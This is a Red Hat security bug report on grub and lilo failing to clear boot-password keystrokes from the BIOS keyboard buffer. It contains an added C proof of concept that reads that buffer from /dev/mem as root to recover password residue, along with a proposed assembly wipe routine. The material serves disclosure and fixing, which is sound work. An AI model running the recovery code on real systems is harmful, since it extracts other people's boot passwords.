Bug 457087 - grub/lilo: fails to sanitize keyboard buffer before and after reading password
Status: CLOSED WONTFIX
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: low
Severity: low
Target Milestone: ---
Assignee: Red Hat Product Security
Reported: 2008-07-29 15:25 UTC by Tomas Hoger
Modified: 2019-09-29 12:25 UTC

Last Closed: 2010-03-22 15:42:35 UTC



Description Tomas Hoger 2008-07-29 15:25:31 UTC
Jonathan Brossard of iViZ Techno Solutions reported that the commonly used
Linux boot loaders grub and lilo fail to sanitize the keyboard buffer before and
after reading pre-boot passwords.

Depending on the OS booted, this can allow privileged (Unix systems) or
unprivileged (Windows systems, according to Jonathan's report) users to extract
the boot password from system memory, or to fill the keyboard buffer with
commands that will be executed by the boot loader on the next reboot.

Further details are planned to be disclosed at the Defcon conference:
https://www.defcon.org/html/defcon-16/dc-16-speakers.html#Brossard
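
The residue the report describes, as an added example that is not part of the
bug report nor of grub's or lilo's code. It emulates the BIOS keyboard ring in
the BIOS Data Area (INT 09h stores a key at the tail pointer, INT 16h consumes
it by advancing the head pointer and leaves the bytes in place) to show why a
password the boot loader has already read is still recoverable, and, when run
as root on a legacy-BIOS x86 Linux system, reads the real 36-byte region at
physical address 0x41a (0x40:0x1a) from /dev/mem. Assumptions: /dev/mem is
readable below 1 MiB (the default even with CONFIG_STRICT_DEVMEM), the machine
booted through a legacy BIOS, and the names bda_push_key, bda_pop_key,
bda_recover and demo_residue are this example's own; the "secret" keystrokes
are constructed sample input.

```c
/* bda_kbd.c: inspect the BIOS keyboard ring buffer in the BIOS Data Area.
 * Added example, not part of the bug report. Build: cc -Wall -o bda_kbd bda_kbd.c */
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define KBD_REGION_PHYS 0x41aUL /* physical address of 0x40:0x1a */
#define KBD_REGION_LEN  36      /* head(2) + tail(2) + 16 entries of (ASCII, scan code) */
#define RING_START      0x1e    /* offsets within segment 0x40 */
#define RING_END        0x3e
#define RING_SLOTS      16

struct bda_kbd { uint8_t raw[KBD_REGION_LEN]; };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = v & 0xff; p[1] = v >> 8; }

/* Emulates the BIOS INT 09h store: put (ASCII, scan code) at the tail pointer and
   advance it, wrapping at the ring end. Returns 0 if the ring is full (key dropped). */
int bda_push_key(struct bda_kbd *b, uint8_t ascii, uint8_t scan)
{
    uint16_t head = rd16(b->raw), tail = rd16(b->raw + 2);
    uint16_t next = tail + 2 >= RING_END ? RING_START : tail + 2;
    if (next == head) return 0;
    b->raw[4 + (tail - RING_START)] = ascii;
    b->raw[5 + (tail - RING_START)] = scan;
    wr16(b->raw + 2, next);
    return 1;
}

/* Emulates INT 16h AH=00h: consume one key by advancing head. The bytes stay. */
int bda_pop_key(struct bda_kbd *b, uint8_t *ascii)
{
    uint16_t head = rd16(b->raw), tail = rd16(b->raw + 2);
    if (head == tail) return 0;
    *ascii = b->raw[4 + (head - RING_START)];
    wr16(b->raw, head + 2 >= RING_END ? RING_START : head + 2);
    return 1;
}

/* Recover leftover keystrokes: walk the ring from tail (the slot overwritten next,
   i.e. the oldest residue) around to the newest slot, keeping printable ASCII.
   Ignores head on purpose: a consumed (head == tail) password is still in the ring.
   Returns the number of characters written to out (NUL-terminated). */
size_t bda_recover(const struct bda_kbd *b, char *out, size_t outlen)
{
    uint16_t tail = rd16(b->raw + 2);
    size_t n = 0;
    if (tail < RING_START || tail >= RING_END || (tail & 1)) tail = RING_START;
    for (unsigned i = 0; i < RING_SLOTS && n + 1 < outlen; i++) {
        unsigned slot = ((tail - RING_START) / 2 + i) % RING_SLOTS;
        uint8_t c = b->raw[4 + 2 * slot];
        if (c >= 0x20 && c < 0x7f) out[n++] = (char)c;
    }
    out[n] = '\0';
    return n;
}

/* Constructed scenario: the boot password "secret" plus Enter is typed and then
   fully consumed by the boot loader's password prompt. */
size_t demo_residue(char *out, size_t outlen)
{
    struct bda_kbd b;
    uint8_t c;
    memset(&b, 0, sizeof b);
    wr16(b.raw, RING_START); wr16(b.raw + 2, RING_START);   /* empty ring */
    for (const char *p = "secret\r"; *p; p++) bda_push_key(&b, (uint8_t)*p, 0x00);
    while (bda_pop_key(&b, &c)) ;          /* password prompt reads every key ... */
    return bda_recover(&b, out, outlen);   /* ... yet "secret" is still readable */
}

int main(void)
{
    char out[RING_SLOTS + 1];
    struct bda_kbd b;
    int fd = open("/dev/mem", O_RDONLY);
    if (fd < 0 || pread(fd, b.raw, KBD_REGION_LEN, KBD_REGION_PHYS) != KBD_REGION_LEN) {
        perror("/dev/mem");
        demo_residue(out, sizeof out);
        printf("simulated residue: \"%s\"\n", out);
        return 1;
    }
    close(fd);
    bda_recover(&b, out, sizeof out);
    printf("head=%#x tail=%#x residue: \"%s\"\n", rd16(b.raw), rd16(b.raw + 2), out);
    return 0;
}
```

Run as root right after a password-protected boot to see what the BIOS left
behind; without /dev/mem access it falls back to the simulated scenario. Note
for anyone implementing the wipe proposed below: INT 09h stores the next
keystroke at whatever offset the tail word holds, so after zeroing the 32-byte
ring the head and tail words should be set back to 0x1e (the ring start)
rather than left at 0.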

Comment 1 Tomas Hoger 2008-07-29 15:28:09 UTC
Jonathan's proposed solution:

Implementing a checking routine doing something like this (this is real-mode
16-bit asm, for the nasm assembler):

; zero 36 bytes starting at address 0x40:0x1a: the BIOS Data Area keyboard
; buffer head pointer (0x1a), tail pointer (0x1c) and the 32-byte ring of
; (ASCII, scan code) pairs (0x1e-0x3d)
    xor ax, ax
    mov al, 0x40
    mov ds, ax          ; DS = BIOS Data Area segment 0x40
    mov al, 0x1a
    mov si, ax          ; SI = offset of the keyboard buffer head pointer
    mov cx, 0x24        ; 36 bytes to clear

    xor al, al          ; AL = 0

cleanall:
    mov [ds:si], al     ; store one zero byte
    inc si              ; advance to the next byte
    loop cleanall


and calling it _before_ and _after_ reading the password will fix both
vulnerabilities.

Comment 5 Tomas Hoger 2008-07-30 12:09:56 UTC
Opening bug, as all the information is now public via the bug-grub mailing list
public archives:

http://www.mail-archive.com/bug-grub@gnu.org/msg11628.html
http://www.mail-archive.com/bug-grub@gnu.org/msg11629.html

